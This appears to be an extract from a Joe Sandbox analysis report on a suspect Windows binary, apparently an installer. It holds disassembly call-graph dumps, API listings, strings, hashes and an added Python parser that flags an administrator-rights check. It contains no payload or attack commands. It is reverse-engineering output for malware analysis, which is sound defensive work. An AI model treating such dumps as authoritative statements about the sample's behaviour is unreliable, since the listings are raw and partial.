IsDBCSLeadByte 53879->53890 53882 42cb02 53882->53824 53883->53882 53891 4037b8 53883->53891 53896 42c454 IsDBCSLeadByte 53883->53896 53887 40374a 53886->53887 53889 40375b 53886->53889 53888 4034bc 4 API calls 53887->53888 53887->53889 53888->53889 53889->53879 53890->53879 53892 403744 4 API calls 53891->53892 53894 4037c6 53892->53894 53893 4037fc 53893->53883 53894->53893 53897 4038a4 53894->53897 53896->53883 53898 4038b1 53897->53898 53905 4038e1 53897->53905 53900 4038da 53898->53900 53902 4038bd 53898->53902 53899 403400 4 API calls 53901 4038cb 53899->53901 53903 4034bc 4 API calls 53900->53903 53901->53893 53906 402678 
LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53902->53906 53903->53905 53905->53899 53906->53901 53907->53829 53908->53833 53909->53838 53910->53846 53912 4035c4 53911->53912 53918 40357c 53911->53918 53913 403450 53912->53913 53915 4035e2 53912->53915 53916 4035d4 53912->53916 53912->53918 53920 4034bc 4 API calls 53913->53920 53922 403464 53913->53922 53917 4034bc 4 API calls 53915->53917 53921 403450 4 API calls 53916->53921 53918->53913 53919 4035bf 53918->53919 53923 40358a 53918->53923 53919->53849 53920->53922 53921->53918 53925 4035b4 53923->53925 53926 40359d 53923->53926 53933->53854 53937 407910 53934->53937 53938 40792d 53937->53938 53945 4075c0 53938->53945 53941 407959 53943 4034e0 4 API calls 53941->53943 53944 40790b 53943->53944 53944->53497 53948 4075db 53945->53948 53946 4075ed 53946->53941 53950 4069a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53946->53950 53948->53946 53951 4076e2 19 API calls 53948->53951 53952 4075b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53948->53952 53950->53941 53951->53948 53952->53948 53954 403400 4 API calls 53953->53954 53962 450991 53954->53962 53957 4509a8 53958 4034e0 4 API calls 53958->53962 53960 40357c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53960->53962 53961 4509bc 53962->53957 53962->53958 53962->53960 53962->53961 53978 42cb8c 6 API calls 53977->53978 53979 42ccba 53978->53979 53980 42ccc2 GetFileAttributesA 53979->53980 53981 403400 4 API calls 53980->53981 53982 42ccdf 53981->53982 53982->53486 53982->53760 53983->53514 53986 4699bb 53984->53986 53985 469e33 53987 469e4e 53985->53987 53988 469e7f 53985->53988 53986->53985 53989 469a76 53986->53989 53992 403494 4 API calls 53986->53992 53991 403494 4 API calls 53987->53991 53993 403494 4 API calls 53988->53993 53990 469a97 53989->53990 53994 469ad8 53989->53994 53995 403494 4 API calls 53990->53995 53996 469e5c 53991->53996 53997 4699fa 53992->53997 53998 469e8d 53993->53998 54002 403400 4 API calls 53994->54002 53999 469aa5 
53995->53999 54090 46889c 12 API calls 53996->54090 54001 414af8 4 API calls 53997->54001 54091 46889c 12 API calls 53998->54091 54004 414af8 4 API calls 53999->54004 54006 469a1b 54001->54006 54007 469ad6 54002->54007 54009 469ac6 54004->54009 54005 469e6a 54008 403400 4 API calls 54005->54008 54010 403634 4 API calls 54006->54010 54027 469bbc 54007->54027 54070 468fa8 54007->54070 54012 469eb0 54008->54012 54014 403634 4 API calls 54009->54014 54015 469a2b 54010->54015 54018 403400 4 API calls 54012->54018 54013 469c44 54016 403400 4 API calls 54013->54016 54014->54007 54019 414af8 4 API calls 54015->54019 54020 469c42 54016->54020 54017 469af8 54021 469b36 54017->54021 54022 469afe 54017->54022 54023 469eb8 54018->54023 54024 469a3f 54019->54024 54085 4693e4 43 API calls 54020->54085 54028 403400 4 API calls 54021->54028 54025 403494 4 API calls 54022->54025 54026 403420 4 API calls 54023->54026 54024->53989 54033 414af8 4 API calls 54024->54033 54029 469b0c 54025->54029 54030 469ec5 54026->54030 54027->54013 54031 469c03 54027->54031 54032 469b34 54028->54032 54076 47ad88 54029->54076 54030->53520 54037 403494 4 API calls 54031->54037 54079 46929c 54032->54079 54034 469a66 54033->54034 54038 403634 4 API calls 54034->54038 54041 469c11 54037->54041 54038->53989 54039 469c6d 54047 469cce 54039->54047 54048 469c78 54039->54048 54040 469b24 54042 403634 4 API calls 54040->54042 54043 414af8 4 API calls 54041->54043 54042->54032 54045 469c32 54043->54045 54049 403634 4 API calls 54045->54049 54046 469b5d 54052 469bbe 54046->54052 54053 469b68 54046->54053 54050 403400 4 API calls 54047->54050 54051 403494 4 API calls 54048->54051 54049->54020 54054 469cd6 54050->54054 54059 469c86 54051->54059 54056 403400 4 API calls 54052->54056 54055 403494 4 API calls 54053->54055 54057 469ccc 54054->54057 54068 469d7f 54054->54068 54061 469b76 54055->54061 54056->54027 54057->54054 54086 4930f0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54057->54086 54059->54054 
54059->54057 54062 403634 4 API calls 54059->54062 54060 469cf9 54060->54068 54087 49339c 18 API calls 54060->54087 54061->54027 54064 403634 4 API calls 54061->54064 54062->54059 54064->54061 54066 469e20 54089 429154 SendMessageA SendMessageA 54066->54089 54088 429104 SendMessageA 54068->54088 54069->53522 54092 42a050 SendMessageA 54070->54092 54072 468fb7 54073 468fd7 54072->54073 54093 42a050 SendMessageA 54072->54093 54073->54017 54075 468fc7 54075->54017 54094 47ada8 54076->54094 54080 4692c9 54079->54080 54081 46932b 54080->54081 54418 469220 43 API calls 54080->54418 54082 403400 4 API calls 54081->54082 54083 469340 54082->54083 54083->54046 54085->54039 54086->54060 54087->54068 54088->54066 54089->53985 54090->54005 54091->54005 54092->54072 54093->54075 54095 403494 4 API calls 54094->54095 54103 47addb 54095->54103 54096 47aee0 54097 403420 4 API calls 54096->54097 54098 47ada3 54097->54098 54098->54040 54099 4037b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54099->54103 54101 403778 4 API calls 54101->54103 54103->54096 54103->54099 54103->54101 54106 479cfc 54103->54106 54338 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54103->54338 54339 403800 54103->54339 54343 42c948 CharPrevA 54103->54343 54107 479d4e 54106->54107 54108 479d2c 54106->54108 54109 479d6e 54107->54109 54110 479d5c 54107->54110 54108->54107 54348 478c2c 19 API calls 54108->54348 54113 479dd1 54109->54113 54114 479d7c 54109->54114 54111 403494 4 API calls 54110->54111 54235 479d69 54111->54235 54121 479df2 54113->54121 54122 479ddf 54113->54122 54115 479d85 54114->54115 54116 479dab 54114->54116 54118 479d98 54115->54118 54349 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54115->54349 54119 479dbe 54116->54119 54350 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54116->54350 54117 403400 4 API calls 54120 47a67c 54117->54120 54124 403494 4 API calls 54118->54124 54126 403494 4 API calls 54119->54126 54127 403400 4 API calls 54120->54127 54130 479e13 
Control Flow Graph: the rendered call graph was extracted as a raw node/edge list and is omitted here. Windows API calls named on the graph's nodes include VirtualAlloc, LocalAlloc, TlsSetValue, TlsGetValue, GetModuleHandleA, GetProcAddress, SetProcessDEPPolicy, GetCommandLineA, GetVersionExA, GetSystemDefaultLCID, GetLocaleInfoA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, GetWindowsDirectoryA, GetSystemDirectoryA, GetEnvironmentVariableA, SetCurrentDirectoryA, GetSystemTimeAsFileTime, FileTimeToSystemTime, WriteFile, GetLastError, LoadStringA, RegisterClassA, UnregisterClassA, GetClassInfoA, CreateWindowExA, ShowWindow, SetFocus, GetWindowTextA, GetMenu, SetMenu, GlobalAlloc, GlobalReAlloc, GlobalFree and KiUserCallbackDispatcher.
                                                                                    Strings
                                                                                    • Same version. Skipping., xrefs: 0046FCC9
                                                                                    • Existing file is a newer version. Skipping., xrefs: 0046FBE6
                                                                                    • User opted not to overwrite the existing file. Skipping., xrefs: 0046FE31
                                                                                    • Installing into GAC, xrefs: 004706D1
                                                                                    • Version of our file: (none), xrefs: 0046FAE0
                                                                                    • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0046FE7A
                                                                                    • Failed to strip read-only attribute., xrefs: 0046FEB7
                                                                                    • InUn, xrefs: 00470129
                                                                                    • Dest filename: %s, xrefs: 0046F878
                                                                                    • Time stamp of our file: %s, xrefs: 0046F97F
                                                                                    • -- File entry --, xrefs: 0046F6DF
                                                                                    • Time stamp of existing file: (failed to read), xrefs: 0046FA1B
                                                                                    • Dest file exists., xrefs: 0046F99F
                                                                                    • Will register the file (a type library) later., xrefs: 004704D0
                                                                                    • Time stamp of existing file: %s, xrefs: 0046FA0F
                                                                                    • Dest file is protected by Windows File Protection., xrefs: 0046F8D1
                                                                                    • Version of existing file: (none), xrefs: 0046FCDE
                                                                                    • Skipping due to "onlyifdestfileexists" flag., xrefs: 0046FEDE
                                                                                    • Couldn't read time stamp. Skipping., xrefs: 0046FD19
                                                                                    • Same time stamp. Skipping., xrefs: 0046FD39
                                                                                    • Version of existing file: %u.%u.%u.%u, xrefs: 0046FB60
                                                                                    • Uninstaller requires administrator: %s, xrefs: 00470159
                                                                                    • Time stamp of our file: (failed to read), xrefs: 0046F98B
                                                                                    • Existing file is protected by Windows File Protection. Skipping., xrefs: 0046FDD0
                                                                                    • Non-default bitness: 32-bit, xrefs: 0046F89F
                                                                                    • Installing the file., xrefs: 0046FEED
                                                                                    • Non-default bitness: 64-bit, xrefs: 0046F893
                                                                                    • Incrementing shared file count (64-bit)., xrefs: 00470549
                                                                                    • @, xrefs: 0046F794
                                                                                    • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 0046FC99
                                                                                    • Will register the file (a DLL/OCX) later., xrefs: 004704DC
                                                                                    • .tmp, xrefs: 0046FF9B
                                                                                    • Skipping due to "onlyifdoesntexist" flag., xrefs: 0046F9B2
                                                                                    • Existing file has a later time stamp. Skipping., xrefs: 0046FDB3
                                                                                    • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 0046FCB4
                                                                                    • Version of our file: %u.%u.%u.%u, xrefs: 0046FAD4
                                                                                    • Incrementing shared file count (32-bit)., xrefs: 00470562
                                                                                    • , xrefs: 0046FBB3, 0046FD84, 0046FE02
                                                                                    • Stripped read-only attribute., xrefs: 0046FEAB
                                                                                    • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 0046FCA8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                    • API String ID: 0-4021121268
                                                                                    • Opcode ID: 39296d02e86210ba95a122c72ed18eadff40a57c25b7f45ff7f5bcbf2b67098f
                                                                                    • Instruction ID: cb3b5b092a3a8f8c122efd66c5c5c6ee12dad63ca724b3077347a87130114cb0
                                                                                    • Opcode Fuzzy Hash: 39296d02e86210ba95a122c72ed18eadff40a57c25b7f45ff7f5bcbf2b67098f
                                                                                    • Instruction Fuzzy Hash: 9B928234A04288DFCB11DFA5D445BDDBBB1AF05304F5480ABE884BB392D7789E49CB5A

                                                                                    Control-flow Graph (shown as an image in the original; block list summarised)
                                                                                    • Blocks 42dfc4-42e1b7. AllocateAndInitializeSid (42dfe0-42e005) runs first and its failure path exits at 42e1af. GetVersion (42e00b-42e028) decides whether CheckTokenMembership is resolved with GetModuleHandleA/GetProcAddress (42e02a-42e03f); if the pointer is non-null it is called (42e045-42e053) and execution continues through 42e059-42e065. Otherwise the fallback path opens the thread token with GetCurrentThread/OpenThreadToken (42e06a-42e084), on failure checks GetLastError and either exits via internal helper 4031bc or opens the process token with GetCurrentProcess/OpenProcessToken (42e09c-42e0af), calls GetTokenInformation twice around helper 402648 (42e0bb-42e122), loops EqualSid over the returned entries (42e13d-42e169), then calls helper 402660 and CloseHandle (42e16b-42e189). Both paths converge on FreeSid (42e191-42e1a7).
                                                                                    APIs
                                                                                    • AllocateAndInitializeSid.ADVAPI32(00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DFFE
                                                                                    • GetVersion.KERNEL32(00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E01B
                                                                                    • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E034
                                                                                    • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E03A
                                                                                    • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E04F
                                                                                    • FreeSid.ADVAPI32(00000000,0042E1AF,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E1A2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                    • String ID: CheckTokenMembership$advapi32.dll
                                                                                    • API String ID: 2252812187-1888249752
                                                                                    • Opcode ID: de8d44d672a8929b680763389e92ce8a04460e4e95b38bd413b506cbd288daf1
                                                                                    • Instruction ID: 81e9a68d7eb5b753086264e3ea48cb09d3699a943d7b2bc0788aba7922d59162
                                                                                    • Opcode Fuzzy Hash: de8d44d672a8929b680763389e92ce8a04460e4e95b38bd413b506cbd288daf1
                                                                                    • Instruction Fuzzy Hash: DE51B271B40625AEEB10EAF69C42BBF77ACDB09704F54047BB900F7282D5BC89158A69
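                                                                                    Added example (not code from the Joe Sandbox report or from the analysed sample): a Python parser for the "APIs" bullets of this function that turns each line into a structured record, rebuilds the SID passed to AllocateAndInitializeSid, and flags the admin-membership pattern (build BUILTIN\Administrators, then test the token with CheckTokenMembership or GetTokenInformation/EqualSid). The sample lines are copied from this function's APIs block and from the FindFirstFileA function later in the report. The RID constants 0x20 and 0x220 are SECURITY_BUILTIN_DOMAIN_RID and DOMAIN_ALIAS_RID_ADMINS from winnt.h, which gives S-1-5-32-544; the identifier-authority value 5 (SECURITY_NT_AUTHORITY) is an assumption, since the report only shows a pointer (00498788) to that structure.

```python
"""Parse Joe Sandbox 'APIs' lines and decode the SID built by AllocateAndInitializeSid.

Added example; not code from the report or from the analysed sample.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Well-known RIDs from winnt.h.
SECURITY_BUILTIN_DOMAIN_RID = 0x20   # 32
DOMAIN_ALIAS_RID_ADMINS = 0x220      # 544
# The report shows only a pointer (00498788) to the identifier-authority struct;
# value 5 (SECURITY_NT_AUTHORITY) is assumed because the BUILTIN RIDs live under it.
ASSUMED_AUTHORITY = 5
ADMINISTRATORS_SID = "S-1-5-32-544"

# Sample lines copied from this function's APIs block in the report.
SAMPLE_ADMIN_CHECK = """
• AllocateAndInitializeSid.ADVAPI32(00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DFFE
• GetVersion.KERNEL32(00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E01B
• GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E034
• GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E03A
• CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E04F
• FreeSid.ADVAPI32(00000000,0042E1AF,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E1A2
"""

# Sample lines copied from the FindFirstFileA function later in the report.
SAMPLE_FILE_SEARCH = """
• FindFirstFileA.KERNEL32(00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 00473F61
• FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 0047403E
• FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 0047404C
"""

API_LINE = re.compile(
    r"(?P<api>[A-Za-z0-9_]+)\.(?P<module>[A-Z0-9]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str] = field(default_factory=list)
    ref: int = 0
    subcall: bool = False   # True for "Part of subcall function ..." lines


def parse_api_lines(text: str) -> list[ApiCall]:
    """Turn the report's APIs bullets into structured records; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"].strip() else []
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16),
                             "Part of subcall function" in line))
    return calls


def arg_value(arg: str) -> int | None:
    """Hex stack value -> int; '?' or string literals such as advapi32.dll -> None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def sid_from_allocate_call(call: ApiCall) -> str | None:
    """Rebuild the SID string from AllocateAndInitializeSid(auth, count, rid0..rid7, &sid).

    The report's argument list is a stack snapshot longer than the real parameter list,
    so only the `count` RIDs the call declares are read.
    """
    if call.api != "AllocateAndInitializeSid" or len(call.args) < 2:
        return None
    count = arg_value(call.args[1])
    if count is None or not 1 <= count <= 8:
        return None
    rids = [arg_value(a) for a in call.args[2:2 + count]]
    if len(rids) != count or any(r is None for r in rids):
        return None
    return "S-1-%d-%s" % (ASSUMED_AUTHORITY, "-".join(str(r) for r in rids))


def is_admin_membership_check(calls: list[ApiCall]) -> bool:
    """Flag the pattern: build BUILTIN\\Administrators, then test the caller's token against it."""
    builds_admin_sid = any(sid_from_allocate_call(c) == ADMINISTRATORS_SID for c in calls)
    names = {c.api for c in calls}
    tests_token = "CheckTokenMembership" in names or {"GetTokenInformation", "EqualSid"} <= names
    return builds_admin_sid and tests_token


if __name__ == "__main__":
    for label, text in (("admin check", SAMPLE_ADMIN_CHECK), ("file search", SAMPLE_FILE_SEARCH)):
        calls = parse_api_lines(text)
        sids = [s for s in map(sid_from_allocate_call, calls) if s]
        print(f"{label}: {len(calls)} calls, SIDs built {sids}, admin check: {is_admin_membership_check(calls)}")
```

                                                                                    The argument lists the report prints are stack snapshots, so they run past the real parameter count; the decoder therefore trusts only the RID count declared in the second argument. The same parser accepts the indented "Part of subcall function" bullets used elsewhere in this report and marks them with the subcall flag.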

                                                                                    Control-flow Graph (shown as an image in the original; block list summarised)
                                                                                    • Blocks 423c1c-424187, a large branching routine with many internal subcalls (423b78, 423b94, 4181f0, 423b24, 423a94 and others). User32 calls by branch: SendMessageA (423f23-423f4a); PostMessageA (423e2e-423e4a, 423e71-423e8e, 423e93-423eb0); IsIconic (423dde-423dec, 4240aa-4240b8); GetFocus/SetFocus (42400a-424055, 4240be-4240e4); IsWindowEnabled (423fe0-423fef, 423f81-423f90); IsWindowVisible (423ff5-424004). The branches converge on 424162-42416a and exit at 424181-424187.
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4d8523de1586cc0fe21acf482102c1559735113aa6e2fedad80b263b22362a32
                                                                                    • Instruction ID: b8faa7015d3197e79f6d1719c020e5f6697e37216349d11362fcbf3b9a892ac2
                                                                                    • Opcode Fuzzy Hash: 4d8523de1586cc0fe21acf482102c1559735113aa6e2fedad80b263b22362a32
                                                                                    • Instruction Fuzzy Hash: 42E1A230700125EFD704EF69E989A6EB7B5EF94304F9480A6E545AB352C73CEE91DB08
                                                                                    APIs
                                                                                      • Part of subcall function 00493D2C: GetWindowRect.USER32(00000000), ref: 00493D42
                                                                                    • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00466E8B
                                                                                      • Part of subcall function 0041D6C0: GetObjectA.GDI32(?,00000018,00466EA5), ref: 0041D6EB
                                                                                      • Part of subcall function 00466898: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046693B
                                                                                      • Part of subcall function 00466898: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466961
                                                                                      • Part of subcall function 00466898: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004669B8
                                                                                      • Part of subcall function 00466254: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00466F40,00000000,00000000,00000000,0000000C,00000000), ref: 0046626C
                                                                                      • Part of subcall function 00493FB0: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00493FBA
                                                                                      • Part of subcall function 0042EBAC: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EC1C
                                                                                      • Part of subcall function 0042EBAC: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EC39
                                                                                      • Part of subcall function 00493C7C: 73A0A570.USER32(00000000,?,?,?), ref: 00493C9E
                                                                                      • Part of subcall function 00493C7C: SelectObject.GDI32(?,00000000), ref: 00493CC4
                                                                                      • Part of subcall function 00493C7C: 73A0A480.USER32(00000000,?,00493D22,00493D1B,?,00000000,?,?,?), ref: 00493D15
                                                                                      • Part of subcall function 00493FA0: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00493FAA
                                                                                    • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,021AD8D0,021AF524,?,?,021AF554,?,?,021AF5A4,?), ref: 00467B3B
                                                                                    • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00467B4C
                                                                                    • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00467B64
                                                                                      • Part of subcall function 0042A06C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A082
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$AppendExtractIconObject$A480A570AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectSelectSendSystemUserWindow
                                                                                    • String ID: $(Default)$STOPIMAGE
                                                                                    • API String ID: 3271511185-770201673
                                                                                    • Opcode ID: 37423c6cb51a93f280f9daeb0ce5abe33e3f8599bfcda42b6dea5e3f600f0df5
                                                                                    • Instruction ID: 7cc469b3bd63a428f44d838a58e066ff967143afc9c1970ffe4cf99f77f4ae1f
                                                                                    • Opcode Fuzzy Hash: 37423c6cb51a93f280f9daeb0ce5abe33e3f8599bfcda42b6dea5e3f600f0df5
                                                                                    • Instruction Fuzzy Hash: 9DF2C6386005148FCB00EB59D5D9F9973F1FF4A308F1542B6E5049B36ADB78AC4ACB8A
                                                                                    APIs
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 00473F61
                                                                                    • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 0047403E
                                                                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 0047404C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                    • String ID: unins$unins???.*
                                                                                    • API String ID: 3541575487-1009660736
                                                                                    • Opcode ID: 74e8728ae2360d7cc9e6142747c4e784bc21d11db711cb29493a318ee3c6f59d
                                                                                    • Instruction ID: 4fd1d9fbc71e550ec417509903356e65f0bc22e0d19a654d6a5f314750c2dfa9
                                                                                    • Opcode Fuzzy Hash: 74e8728ae2360d7cc9e6142747c4e784bc21d11db711cb29493a318ee3c6f59d
                                                                                    • Instruction Fuzzy Hash: 3D3163746001489FCB20EB65C981AEEB7BDDF84304F5184B6E50CAB2A2DB39DF458F58
                                                                                    APIs
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,00452123,?,?,-00000001,00000000), ref: 004520FD
                                                                                    • GetLastError.KERNEL32(00000000,?,00000000,00452123,?,?,-00000001,00000000), ref: 00452105
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
